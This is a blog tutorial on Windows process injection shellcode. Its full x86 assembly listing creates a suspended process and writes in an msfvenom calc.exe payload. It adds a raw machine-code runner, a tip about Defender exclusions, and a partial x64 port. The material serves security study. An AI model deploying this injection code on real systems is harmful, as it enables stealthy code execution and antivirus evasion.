Shellcoding: Process Injection with Assembly
July 2021
Introduction
It has been a long time since my last blog post focusing on shellcode. I took a bit of a break from shellcode and focused on a topic that I found interesting, OffSecOps. I plan to continue refining my OffSecOps pipeline but, for now, I intend to finish this series of blog posts related to shellcode.
As a reminder, or for anyone just joining, this series of posts is focusing on my analysis and study of SK Chong’s work that was published in issue 62 of Prack in 2001. What made his approach interesting to me was that he reused/rebound the port using the vulnerable application. This could be useful in a situation where a firewall is configured to allow connections to a specific port to a specific application. The final shellcode I was able to reconstruct from his blog post performs the following activities:
- Locates EIP
- Decodes the encoded shellcode using a simple XOR routine
- Locates the base address of Kernel32.dll
- Resolves the addresses of several Win32 APIs
- Locates the path to the current process
- Creates a suspended version of the process
- Injects itself into the suspended process
- The injected “forked” shellcode will loop trying to bind to the target port until the parent thread exits
In this blog post, I will cover how the final shellcode locates the path to the current executable in memory, how it creates a suspended process, and injects a thread containing a payload. In this example, the payload will be generated with msfvenom and execute calc.exe.
x86
As stated in the past, these posts will start by demonstrating the technique in x86 and then show the same technique in x64.
x86: Resolving the Current Process Path
Since the outcome of the assembly programs execution requires that the newly spawned process replace the exploited process with a version of itself, it is necessary to know the path of the process that is being exploited. Assuming that the path is not known, and that the vulnerable system is a black box, how does one obtain the path? There is a trick that was written about here and here. (NOTE: There appears to be an error in Borja’s example code. He is using the “Window Title” The basic approach is to:
- Locate the PEB structure.
- Locate the _RTL_USER_PROCESS_PARAMETERS structure, located in the PEB structure.
- Locate the value of ImagePathName in the _RTL_USER_PROCESS_PARAMETERS structure.
How to obtain the address of the PEB structure was covered in an earlier post. Please refer to the blog titled: Shellcoding: Locating Kernel32 Base Address for details of how it is located. The following is a truncated dump of the PEB structure from WinDbg (WinDbg command: dt nt!_PEB):
Code Listing 1: PEB Structure
According to the information from WinDbg, the _RTL_USER_PROCESS_PARAMETERS structure is at an offset of 0x10. Dumping the _RTL_USER_PROCESS_PARAMETERS structure with WinDbg gives us (WinDbg command: dt nt!_RTL_USER_PROCESS_PARAMETERS):
Code Listing 2: _RTL_USER_PROCESS_PARAMETERS Structure
The truncated output shows that the ImagePathName is a _UNICODE_STRING object and that it is stored at an offset of 0x38. For completeness, here is a dump of the _UNICODE_STRING structure from WinDbg (WinDbg command: dt nt!_UNICODE_STRING):
Code Listing 3: _UNICODE_STRING Structure
What this means is that the Unicode string holding the path to the current process can be found at offset 0x3C of the _RTL_USER_PROCESS_PARAMETERS structure. The following WinDbg commands will display the ImagePathName value of the current process:
- To find the address of the PEB:
- !peb
Figure 1: Finding the PEB Address
- To find the address of the _RTL_USER_PROCESS_PARAMETERS structure at offset 0x10:
- dt nt!_PEB
- dt nt!_PEB
Figure 2: Find the Offset of the _RTL_USER_PROCESS_PARAMETERS Structur
- Return the ImageProcessName value from the _RTL_USER_PROCESS_PARAMETERS structure:
- du poi(<_RTL_USER_PROCESS_PARAMETERS_ADDRESS> + 0x3C)
Figure 3: Locating the ImageProcessName Value
In assembly, this would look like:
1
2
3
4
5
mov eax, [fs:0x30] ; Store the address of the PEB structure in EAX
mov eax, [eax+0x10] ; Store the address of the _RTL_USER_PROCESS_PARAMETERS
; structure in EAX
mov eax, [eax+0x3C] ; Store the address of the ImageProcessName value in EAX
mov [ebp+0x40], eax ; Store the address of the process path at EBP+0x40 to use later
Code Listing 4: Locating the Current Process Name
x86: Creating a Suspended Process
With EAX holding the path to the current process, the next step is to create a suspended process to inject code into. This process is common to many injection techniques. There are variations that include completely remapping the suspended process to simply injecting a new thread. For our purposes, we will simply be injecting a new thread. To create a suspended process, the following actions must be completed:
- Create empty PROCESS_INFORMATION and STARTUPINFO structures.
- Push the required arguments to the stack, including the ImagePathName gathered in the previous section.
- Call CreateProcessW. The address of CreateProcessW will be stored at [EBP+0x08] in this example. To learn more about resolving Win32 API addresses, see the previous blog.
The documentation from Microsoft shows the required arguments to call CreateProcessW. If you are unfamiliar with this Win32 API, it is recommended that you visit Microsoft’s documentation to familiarize yourself before continuing.
Code Listing 5: CreateProcessW Win32 API
Creating & Initializing PROCESS_INFORMATION and STARTUPINFO Structures
CreateProcessW’s last two arguments are a STARTUPINFOW structure and PROCESS_INFORMATION structure. The STARTUPINFOW structure is 0x44 bytes in length and the PROCESS_INFORMATION structure is 0x10 bytes in length. To create space for these structures 0x54 (84) bytes will need to be allocated on the stack and initialized. The following assembly instructions will do this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
xor ecx, ecx ; Zero EXC to be used as a counter
mov cl, 0x54 ; Set EXC (via CL) to 0x54, the number of bytes
; to allocate
create_empty_structure:
pop ebx ; Preserve EBX
xor eax, eax ; Zero EAX
sub esp, ecx ; Allocate stack space for the two structures
mov edi, esp ; set EDI to point to the STARTUPINFO structure
push edi ; Preserve EDI on the stack as it will be
; modified by the following instructions
rep stosb ; Repeat storing zero at the buffer starting
; at EDI until ECX is zero
pop edi ; restore EDI to its original value
push ebx ; Restore EBX
ret
Code Listing 6: Initializing an Empty Structure
The above assembly code creates a 0x54 byte region on the stack, zeros it out and stores its location in EDI. There is one value in the STARTUPINFOW structure which must be initialized with the length of the structure, which is 0x44 bytes. Referring to the documentation, the first element in the STARTUPINFOW structure is cb and it contains the length of the structure. The following assembly code will complete the initialization of the two structures.
1
2
mov byte[edi], 0x44 ; Set the cb member value of the STARTUPINFOW
; structure to 0x44
Code Listing 7: Setting the cb Value in the STARTUPINFOW Structure
Calling CreateProcessW
With the required structures in place, all that remains is to push the required arguments of the CreateProcessW Win32 API to the stack and call it. The dwCreationFlags value will be set to 0x04. According to the documentation, the value 0x04 equates to CREATE_SUSPENDED. This will create the process in a suspended state that will allow the process to be manipulated by the assembly program to redirect execution to the injected payload. The following assembly instructions will prepare the arguments on the stack and make the call to CreateProcessW.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
; Create Suspended Process
lea esi, [edi+0x44] ; Load the effective address of the PROCESS_INFORMATION
; structure into ESI
push esi ; Push the pointer to the lpProcessInformation
; structure
push edi ; Push the pointer to the lpStartupInfo structure
push eax ; lpCurrentDirectory = NULL
push eax ; lpEnvironment = NULL
push 0x04 ; dwCreationFlags = CREATE_SUSPENDED
push eax ; bInheritHandles = FALSE
push eax ; lpThreadAttributes = NULL
push eax ; lpProcessAttributes = NULL
push dword [ebp+0x40] ; lpCommandLine = current process
push eax ; lpApplicationName = NULL
call [ebp+0x08] ; Call CreateProcessW
Code Listing 8: Calling CreateProcessW with Assembly
Injecting Code into the Suspended Process
For this blog, the instructions that will be injected into the suspended process will execute calc.exe for demonstration purposes. The final version of the shellcode will inject a modified version of itself into the suspended process. To inject the instructions into the suspended process the assembly code will need to:
- Get the thread information from the suspended process and store the information in a CONTEXT object using GetThreadContext, stored at [EBP+0x10].
- Allocate space for the code to be injected using VirtualAllocEx, stored at [EBP+0x14].
- Change the active thread stored in the CONTEXT object.
- Write the injected code to the allocated space using WriteProcessMemory, stored at [EBP+0x18].
- Redirect execution in the suspended process by writing the modified CONTEXT object to it using SetThreadContext, stored at [EBP+0x1C].
- Resume the suspended process using ResumeThread, stored at [EBP+0x20].
Getting the Thread Information
There is a lot going on to achieve the goal of injecting code into a suspended process. The first task required to achieve the goal is to retrieve the thread information from the suspended process and store it in a CONTEXT object. To perform this, a call to GetThreadContext will be made.
Code Listing 9: GetThreadContext Win32 API
The CONTEXT object is 0x400 (1024) bytes in length. The assembly code will need to allocate space on the stack for the new CONTEXT object and set the ContextFlags value to 0x010007, which equates to CONTEXT_FULL. To understand the contents of a CONTEXT structure, you can view it using WinDbg by issuing the command: dt nt!_CONTEXT.
A call to GetThreadContext also requires a thread handle of the target process. A handle to the suspended process is stored in the PROCESS_INFORMATION structure that was created earlier. ESI still contains the address of the structure, and the thread handle is stored at an offset of 0x04. The assembly code will need to push the hThread value to the stack before calling GetThreadContext.
The following assembly code will allocate a CONTEXT structure, push its location to the stack, push the hThread value, and call GetThreadContext:
1
2
3
4
5
sub esp, 0x0400 ; Create 1024 bytes for CONTEXT object on stack
push 0x010007 ; CONTEXT ContextFlags = CONTEXT_FULL
push esp ; lpContext
push dword [esi+0x04] ; hThread = PROCESS_INFORMATION.hThread = ESI+0x04
call [ebp+0x10] ; Call GetThreadContext
Code Listing 10: Creating a Context Structure and Calling GetThreadContext
Allocating Space for the Injected Payload
To inject code, space must be allocated. The allocated space must be large enough and have permissions that will allow code to be executed. To do this, the VirtualAllocEx Win32 API will be called.
Code Listing 11: VirtualAllocEx Win32 API
The first value that VirtualAllocEX needs is a handle to the process. The handle is stored as the first element of the PROCESS_INFORMATION structure that is stored on the stack and referenced by ESI. This means that the hProcess value will simply be the value of ESI.
Next, the lpAddress value will be set to 0. Setting this value to zero will result in VirtualAllocEx selecting a suitable location on its own.
The dwSize value controls the amount of space that is to be allocated in the target process. This value can be exact or larger than needed. For this example, the space will be larger than what is needed to store the example payload that will be injected.
The flAllocationType is memory allocation flag. This value will be set to 0x1000, which represents MEM_COMMIT. Using this flag will ensure that the allocated space will be zeros according to the documentation.
Finally, the flProtect flag will be set to 0x40, which represents PAGE_EXECUTE_READWRITE so that the allocated memory will have read, write, and executable properties.
This assembly code will provide the necessary values and make a call to VurtualAllocEx:
1
2
3
4
5
6
push 0x40 ; flProtect = PAGE_EXECUTE_READWRITE
push 0x1000 ; flAllocationType = MEM_COMMIT
push 0x5000 ; dwSize = 20kb
push 0 ; lpAddress = NULL
push dword [esi] ; hProcess = PROCESS_INFORMATION.hProcess = ESI
call [ebp+0x14] ; Call VirtualAllocEx
Code Listing 12: Calling VirtualAllocEx
Modify the CONTEXT Object to Redirect Code Execution
The next task that needs done is to update the CONTEXT object that was populated by the call to GetThreadContext with the address of the newly allocated space returned by the call to VirtualAllocEx that is now stored in the EAX register. This will be done by simply updating the value. According to the output from WinDbg, the value of EIP is stored at an offset of 0x0B8:
Code Listing 13: Finding the EIP Offset in a CONTEXT Structure
The following code will update the EIP value in the CONTEXT object:
Code Listing 14: Setting the EIP Value
Writing the Payload to the Suspended Process
To write the payload to the allocated space in the suspended process the WriteProcessMemory Win32 API will be called.
Code Listing 15: WriteProcessMemory Win32 API
The hProcess value will once again be provided by the first element of the PROCESS_INFORMATION structure on the stack and referenced by ESI.
The lpBaseAddress value is the return value from the call to VirutalAllocEx, which is still stored in EAX. This is the address where the injected code will be written.
The lpBuffer is the location of the code that will be injected into the suspended process. The same trick that was used in this blog entry will be used to mark the beginning of the code that will be injected. In this example, the injected code is being stored as dword values using the NASM pseudo instruction dd. This value will wind up being stored on the stack.
The nSize value will be pushed to the stack. This value should match the size of the code you are injecting into the suspended process. In the example, the code is 192 bytes in size. The value 0x0C0 is 192 in hexadecimal format.
The value 0 is pushed to the stack for the lpNumberOfBytesWritten value. This is the equivalent to setting the value to NULL. Setting the value to NULL causes this value to be ignored.
The following code will write the data stored in the assembly program to the address stored in EAX. This example is incomplete but shows the process:
Code Listing 16: Write a Stored Payload to a Suspended Process
Setting the Thread Context
With the injected code written to the suspended process, the thread context needs to be updated with the modified CONTEXT object. The CONTEXT object should still be located at ESP in this example. The SetThreadContext Win32 API will be called to update the suspended process.
Code Listing 17: SetThreadContext Win32 API
The hThread value will, again, be provided by the hThread value at the offset of 0x04 of the PROCESS_INFORMATION object stored on the stack and referenced by ESI.
The lpContext value will be provided by the CONTEXT object stored on the stack and currently located at the top of the stack.
The following assembly code will update the thread context in the suspended process:
1
2
3
push esp ; lpContext = CONTEXT structure
push dword [esi+0x04] ; hThread = PROCESS_INFORMATION.hThread = ESI+0x04
call [ebp+0x1C] ; Call SetThreadContext
Code Listing 18: Calling SetThreadContext
Resuming the Suspended Process
The stage is now set to resume the suspended process and execute the injected code. The ResumeThread Win32 API will be called to resume the process.
Code Listing 19: ResumeThread Win32 API
The hThread stored in the PROCESS_INFORMATION object stored in ESI will be used one final time to provide the sole argument required by the ResumeThread function.
The following assembly code will resume the suspended thread and execute the injected code.
1
2
push dword [esi+0x04] ; hThread = PROCESS_INFORMATION.hThread = ESI+0x04
call [ebp+0x20] ; Call ResumeThread
Code Listing 20: Calling Resume Thread
Putting it All Together
The following code will inject the stored code into a suspended copy of the current process:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
[SECTION .text]
BITS 32
_start:
jmp main
; Constants
win32_library_hashes:
call win32_library_hashes_return
; LoadLibraryA
dd 0xEC0E4E8E
; CreateProcessW - EBP + 0x08
dd 0x16B3FE88
; ExitProcess - EBP + 0x0C
dd 0x73E2D87E
; GetThreadContext - EBP + 0x10
dd 0x68A7C7D2
; VirtualAllocEx - EBP + 0x14
dd 0x6E1A959C
; WriteProcessMemory - EBP + 0x18
dd 0xD83D6AA1
; SetThreadContext - EBP + 0x1C
dd 0xE8A7C7D3
; ResumeThread - EBP + 0x20
dd 0x9E4A3F88
; ======== Function: find_kernel32
find_kernel32:
push esi
xor eax, eax
mov eax, [fs:eax+0x30]
mov eax, [eax+0x0C]
mov esi, [eax+0x1C]
mov esi, [esi]
lodsd
mov eax, [eax+0x08]
pop esi
ret
; ======= Function: find_function
find_function:
pushad
mov ebp, [esp+0x24]
mov eax, [ebp+0x3C]
mov edx, [ebp+eax+0x78]
add edx, ebp
mov ecx, [edx+0x18]
mov ebx, [edx+0x20]
add ebx, ebp
find_function_loop:
jecxz find_function_finished
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
compute_hash:
xor edi, edi
xor eax, eax
cld
compute_hash_again:
lodsb
test al, al
jz compute_hash_finished
ror edi, 0x0D
add edi, eax
jmp compute_hash_again
compute_hash_finished:
find_function_compare:
cmp edi, [esp+0x28]
jnz find_function_loop
mov ebx, [edx+0x24]
add ebx, ebp
mov cx, [ebx+2*ecx]
mov ebx, [edx+0x1C]
add ebx, ebp
mov eax, [ebx+4*ecx]
add eax, ebp
mov [esp+0x1C], eax
find_function_finished:
popad
ret
; ======== Function: resolve_symbols_for_dll
resolve_symbols_for_dll:
lodsd
push eax
push edx
call find_function
mov [edi], eax
add esp, 0x08
add edi, 0x04
cmp esi, ecx
jne resolve_symbols_for_dll
resolve_symbols_for_dll_finished:
ret
; ======= Inject Code
; Payload
injected_code:
call injected_code_return
; msfvenom -p windows/exec -a x86 --platform windows CMD=calc -f dword
; No encoder specified, outputting raw payload
; Payload size: 192 bytes
dd 0x0082e8fc
dd 0x89600000
dd 0x64c031e5
dd 0x8b30508b
dd 0x528b0c52
dd 0x28728b14
dd 0x264ab70f
dd 0x3cacff31
dd 0x2c027c61
dd 0x0dcfc120
dd 0xf2e2c701
dd 0x528b5752
dd 0x3c4a8b10
dd 0x78114c8b
dd 0xd10148e3
dd 0x20598b51
dd 0x498bd301
dd 0x493ae318
dd 0x018b348b
dd 0xacff31d6
dd 0x010dcfc1
dd 0x75e038c7
dd 0xf87d03f6
dd 0x75247d3b
dd 0x588b58e4
dd 0x66d30124
dd 0x8b4b0c8b
dd 0xd3011c58
dd 0x018b048b
dd 0x244489d0
dd 0x615b5b24
dd 0xff515a59
dd 0x5a5f5fe0
dd 0x8deb128b
dd 0x8d016a5d
dd 0x0000b285
dd 0x31685000
dd 0xff876f8b
dd 0xb5f0bbd5
dd 0xa66856a2
dd 0xff9dbd95
dd 0x7c063cd5
dd 0xe0fb800a
dd 0x47bb0575
dd 0x6a6f7213
dd 0xd5ff5300
dd 0x636c6163
dd 0x00000000
create_empty_structure:
pop ebx
xor eax, eax ; Zero EAX
sub esp, ecx ; Allocate stack space for the two structures
mov edi, esp ; set edi to point to the STARTUPINFO structure
push edi ; Preserve EDI on the stack as it will be modified by the following instructions
rep stosb ; Repeat storing zero at the buffer starting at edi until ecx is zero
pop edi ; restore EDI to its original value
push ebx
ret
perform_injection:
; Get current process ImagePathName
mov eax, [fs:0x30] ; Store the address of the PEB structure in EAX
mov eax, [eax+0x10] ; Store the address of the _RTL_USER_PROCESS_PARAMETERS
; structure in EAX
mov eax, [eax+0x3C] ; Store the address of the ImageProcessName value in EAX
mov [ebp+0x40], eax ; Store the address of the process path at EBP+0x40 to use later
; Create & Initialize structures
xor ecx, ecx
mov cl, 0x54
call create_empty_structure
mov byte[edi], 0x44 ; Set STARTUPINFOW.cb = 0x44
; Create a suspended process
lea esi, [edi+0x44] ; Load the effective address of the PROCESS_INFORMATION structure into ESI
push esi ; Push the pointer to the lpProcessInformation structure
push edi ; Push the pointer to the lpStartupInfo structure
push eax ; lpCurrentDirectory = NULL
push eax ; lpEnvironment = NULL
push 0x04 ; dwCreationFlags = CREATE_SUSPENDED
push eax ; bInheritHandles = FALSE
push eax ; lpThreadAttributes = NULL
push eax ; lpProcessAttributes = NULL
push dword [ebp+0x40] ; lpCommandLine = current process
push eax ; lpApplicationName = NULL
call [ebp+0x08] ; Call CreateProcessW
; Begin GetThreadContext
sub esp, 0x0400 ; Create 1024 bytes for CONTEXT object on stack
push 0x010007 ; CONTEXT ContextFlags = CONTEXT_FULL
push esp ; lpContext
push dword [esi+0x04] ; hThread = PROCESS_INFORMATION.hThread = ESI+0x04
call [ebp+0x10] ; Call GetThreadContext
; Begin VirtualAllocEx
push 0x40 ; flProtect = PAGE_EXECUTE_READWRITE
push 0x1000 ; flAllocationType = MEM_COMMIT
push 0x5000 ; dwSize = 20kb
push 0 ; lpAddress = NULL
push dword [esi] ; hProcess = PROCESS_INFORMATION.hProcess = ESI
call [ebp+0x14] ; Call VirtualAllocEx
; Setup CONTEXT object for thread change
mov [esp+0xB8], eax ; CONTEXT object offset 0xB8 = EIP
; Begin WriteProcessMemory
push 0 ; lpNumberOfBytesWritten = NULL
push 0x0C0 ; nSize = 0x0C0 = 192 bytes
jmp long injected_code ; jump to the stored code
injected_code_return: ; lpBuffer = return address pushed to the stack
push eax ; lpBaseAddress = EAX
push dword [esi] ; hProcess = PROCESS_INFORMATION.hProcess = ESI
call [ebp+0x18] ; Call WriteProcessMemory
; Begin SetThreadContext
push esp ; lpContext = CONTEXT structure
push dword [esi+0x04] ; hThread = PROCESS_INFORMATION.hThread = ESI+0x04
call [ebp+0x1C] ; Call SetThreadContext
; Begin ResumeThread
push dword [esi+0x04] ; hThread = PROCESS_INFORMATION.hThread = ESI+0x04
call [ebp+0x20] ; Call ResumeThread
; Begin TerminateProcess
call [ebp+0x0C]
main:
sub esp, 0x88 ; Allocate space on stack for function addresses
mov ebp, esp ; Set ebp as frame ptr for relative offset on stack
call find_kernel32 ; Find base address of kernel32.dll
mov edx, eax ; Store base address of kernel32.dll in EDX
jmp long win32_library_hashes
win32_library_hashes_return:
pop esi
lea edi, [ebp+0x04] ; This is where we store our function addresses
mov ecx, esi
add ecx, 0x20 ; Length of kernel32 hash list
call resolve_symbols_for_dll
call perform_injection
Code Listing 21: Full x86 Injection Assembly Program
Testing it Out
In an earlier blog, I showed a different C program to run our compiled code. In this blog, another method will be shown. This method will allocate space for the code to run from and mark it as executable. This avoids the need to manipulate the compiled program to change the memory settings or disabling stack protection. The following code can handle both x86 and x64 machine code. This blog will demonstrate the process of compiling and preparing the code from a Linux system:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <windows.h>
int main()
{
#ifdef _WIN64
unsigned char buf[] =
"Replace_with_x64_payload";
#else
unsigned char buf[] =
"Replace_with_x86_payload";
#endif
void *func = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(func, buf, sizeof buf);
((void(*)())func)();
return 0;
}
Code Listing 22: Machine Code Inection Harness
To compile the assembly program:
To convert the binary file to escaped hexadecimal values that can be pasted into the above template, my bin-to-opcodes.py Python script can be used.
To clean up the contents of the escaped code and place it on the clipboard, using linux:
Paste the code into the above template in the x86 section, then compile it using MingW:
It should now be possible to copy the resulting PE file to a test system and execute it. For convenience, you should place the file into a folder with a Defender exception in place. This code is obfuscated in no way, it may be detected as malicious by Defender. Obfuscating the machine code runner and machine code is an exercise left to the reader.
x64
This section of the blog post will focus on differences in the assembly program that was written above for the x86 architecture and a version that performs the same process using the x64 architecture.
Resolving the Current Process Path
The process of finding the current process’ path is nearly identical to the how it is done on an x86 process. The main difference in the process are the sizes of the offsets that are required.
The _RTL_USER_PROCESS_PARAMETERS object is located at an offset of 0x20, instead of 0x10:
Figure 4: Finding the _RTL_USER_PROCESS_PARAMETER Offset
The ImagePathName is at an offset of 0x60 instead of 0x38, accounting for the larger structure, the offset of the Unicode string will be 0x68:
Figure 5: Finding the ImagePathName Offset
To dump the Unicode string using WinDbg, use the following command:
Figure 6: Displaying the ImagePathName Value Using WinDbg
The updated assembly code to find the process name:
1
2
3
4
5
mov rax, [gs:0x60] ; Store the address of the PEB structure in RAX
mov rax, [rax+0x20] ; Store the address of the _RTL_USER_PROCESS_PARAMETERS
; structure in RAX
mov rax, [rax+0x68] ; Store the address of the ImageProcessName value in RAX
mov [r13+0x40], rax ; Store the address of the process path at r13+0x40 to use later
Code Listing 23: Locating the Current Process Path
Calling Win32 APIs
Another difference that will need to be addressed in 64-bit is the calling convention that is used. In x86, argument values are pushed to the stack in reverse order. Meaning the last argument is pushed first and the first argument to the function is pushed last. In x64, the first four arguments are stored in registers instead of the stack and anything past the fourth argument are pushed to the stack. The following article describes how this works:
Additionally, according to that documentation, a shadow store must be created on the stack. This shadow space can be used to store the 4 registers (RCX, RDX, R8, R9) if necessary. This shadow space must be 32-bytes. This will place the first argument that is pushed to the stack (fifth function argument) at an offset of RSP+0x20. According to the documentation, this shadow space must be made available to the callee function. The stack will look something like this when making a x64 function fastcall:
Figure 7: x64 Fastcall Stack Visual
This example from the final assembly program demonstrates a call to CreateProcessW. Since the arguments are integers and memory pointers, the calling convention used will be:
- function(RCX, RDX, R8, R9, [RSP+0x20], [RSP+0x28], [RSP+0x30], …)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
; Create a suspended process
xor rcx, rcx ; prep the stack for x64 fastcall
; 6 arguments + 0x20 bytes = 0x48
mov cl, 0x48
call create_empty_structure ; Zero out the stack space used
lea rsi, [rdi+0x68] ; Load the effective address of the
; PROCESS_INFORMATION structure into RSI
mov [rsp+0x48], rsi ; Push the pointer to the lpProcessInformation
; structure
mov [rsp+0x40], rdi ; Push the pointer to the lpStartupInfo
; structure
mov [rsp+0x38], rax ; lpCurrentDirectory = NULL
mov [rsp+0x30], rax ; lpEnvironment = NULL
mov byte [rsp+0x28], 0x04 ; dwCreationFlags = CREATE_SUSPENDED
mov [rsp+0x20], rax ; bInheritHandles = FALSE
mov r9, rax ; lpThreadAttributes = NULL
mov r8, rax ; lpProcessAttributes = NULL
mov rdx, qword [r13+0x48] ; lpCommandLine = current process
mov rcx, rax ; lpApplicationName = NULL
call [r13+0x08] ; Call CreateProcessW
add rsp, 0x48 ; Clean up the stack 0x20 + 0x28 = fastcall +
; 6 arguments
Code Listing 24: Calling CreateProcessW In x64 Assembly
Notice that the arguments beyond the first four arguments are moved to the stack, with the last argument being the furthest from RSP. Also notice that after the call returns, RSP is restored by subtracting 0x48 bytes from the stack. In x64 fastcalls, the calling function is responsible for cleaning up the stack. To better illustrate the fastcall, what registers are used and where arguments are in the stack, let us look at the CreateProcessW call in more detail.
According to Microsoft’s documentation, the CreateProcessW call requires 10 arguments. Based on the calling convention, the arguments will need to placed in the corresponding registers and stack offsets:
Code Listing 25: CreateProcessW with Comments Denoting Argument Locations
CONTEXT Structure Alignment
While converting the assembly code from x86 to x64, there was an issue with the CONTEXT structure creation. In researching the issue, it appeared that the CONTEXT structure’s address needs to be 16-Bit aligned. To ensure that the CONTEXT structure is properly aligned, the following routine was used. The CONTEXT structure’s address will be stored in the R15 register for convenience:
1
2
3
4
5
6
7
8
9
xor rcx, rcx ; Create CONTEXT object
mov ecx, 0x04F8 ; CONTEXT + 0x08 for padding for stack adjustment
call create_empty_structure
; Save CONTEXT object & 16-bit align it
mov r15, rsp
push 0
and r15, -16 ; CONTEXT object should be 16-bit aligned
mov dword [r15+0x30], 0x010007 ; CONTEXT ContextFlags = CONTEXT_FULL
Code Listing 26: Creating CONTEXT Structure at a 16-bit Aligned Address
Full Assembly Program
After converting the Assembly code from x86 to x64, the final assembled program weighs in at 873 bytes. There are likely corners that can be cut to reduce the size of the final program.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
[SECTION .text]
BITS 64
_start:
jmp main
; Constants
win32_library_hashes:
call win32_library_hashes_return
; LoadLibraryA R13
dd 0xEC0E4E8E
; CreateProcessW - R13 + 0x08
dd 0x16B3FE88
; TerminateProcess - R13 + 0x10
dd 0x78B5B983
; GetThreadContext - R13 + 0x18
dd 0x68A7C7D2
; VirtualAllocEx - R13 + 0x20
dd 0x6E1A959C
; WriteProcessMemory - R13 + 0x28
dd 0xD83D6AA1
; SetThreadContext - R13 + 0x30
dd 0xE8A7C7D3
; ResumeThread - R13 + 0x38
dd 0x9E4A3F88
; GetCurrentProcess - R13 + 40
dd 0x7B8F17E6
; ======== Function: find_kernel32
find_kernel32:
push rsi
mov rax, [gs:0x60]
mov rax, [rax+0x18]
mov rax, [rax+0x20]
mov rax, [rax]
mov rax, [rax]
mov r11, [rax+0x20] ; Kernel32 Base Stored in R11
pop rsi
ret
; ======= Function: find_function
find_function:
mov eax, [r11+0x3C]
mov edx, [r11+rax+0x88]
add rdx, r11 ; RDX now points to the IMAGE_DATA_DIRECTORY structure
mov ecx, [rdx+0x18] ; ECX = Number of named exported functions
mov ebx, [rdx+0x20]
add rbx, r11 ; RBX = List of exported named functions
find_function_loop:
jecxz find_function_finished
dec ecx ; Going backwards
lea rsi, [rbx+rcx*4] ; Point RSI at offset value of the next function name
mov esi, [rsi] ; Put the offset value into ESI
add rsi, r11 ; RSI now points to the exported function name
compute_hash:
xor edi, edi ; Zero EDI
xor eax, eax ; Zero EAX
cld ; Reset direction flag
compute_hash_again:
mov al, [rsi] ; Place the first character from the function name into AL
inc rsi ; Point RSI to the next character of the function name
test al, al ; Test to see if the NULL terminator has been reached
jz compute_hash_finished
ror edi, 0x0D ; Rotate the bits of EDI right 13 bits
add edi, eax ; Add EAX to EDI
jmp compute_hash_again
compute_hash_finished:
find_function_compare:
cmp edi, r12d ; Compare the calculated hash to the stored hash
jnz find_function_loop
mov ebx, [rdx+0x24] ; EBX contains the offset to the
; AddressNameOrdinals list
add rbx, r11 ; RBX points to the AddressNameOrdinals list
mov cx, [rbx+2*rcx] ; CX contains the function number matching the
; current function
mov ebx, [rdx+0x1C] ; EBX contains the offset to the AddressOfNames list
add rbx, r11 ; RBX points to the AddressOfNames List
mov eax, [rbx+4*rcx] ; EAX contains the offset of the desired function address
add rax, r11 ; RAX contains the address of the desired function
find_function_finished:
ret
; ======== Function: resolve_symbols_for_dll
resolve_symbols_for_dll:
mov r12d, [r8d] ; Move the next function hash into R12
add r8, 0x04 ; Point R8 to the next function hash
call find_function
mov [r15], rax ; Store the resolved function address
add r15, 0x08 ; Point to the next free space
cmp r9, r8 ; Check to see if the end of the hash list was reached
jne resolve_symbols_for_dll
resolve_symbols_for_dll_finished:
ret
; ======== Inject Code
; Payload
injected_code:
call injected_code_return
; msfvenom -p windows/x64/exec -a x64 --platform windows CMD=calc -f dword
; EXITFUNC=thread
; No encoder specified, outputting raw payload
; Payload size: 272 bytes
; Final size of dword file: 832 bytes
dd 0xe48348fc
dd 0x00c0e8f0
dd 0x51410000
dd 0x51525041
dd 0xd2314856
dd 0x528b4865
dd 0x528b4860
dd 0x528b4818
dd 0x728b4820
dd 0xb70f4850
dd 0x314d4a4a
dd 0xc03148c9
dd 0x7c613cac
dd 0x41202c02
dd 0x410dc9c1
dd 0xede2c101
dd 0x48514152
dd 0x8b20528b
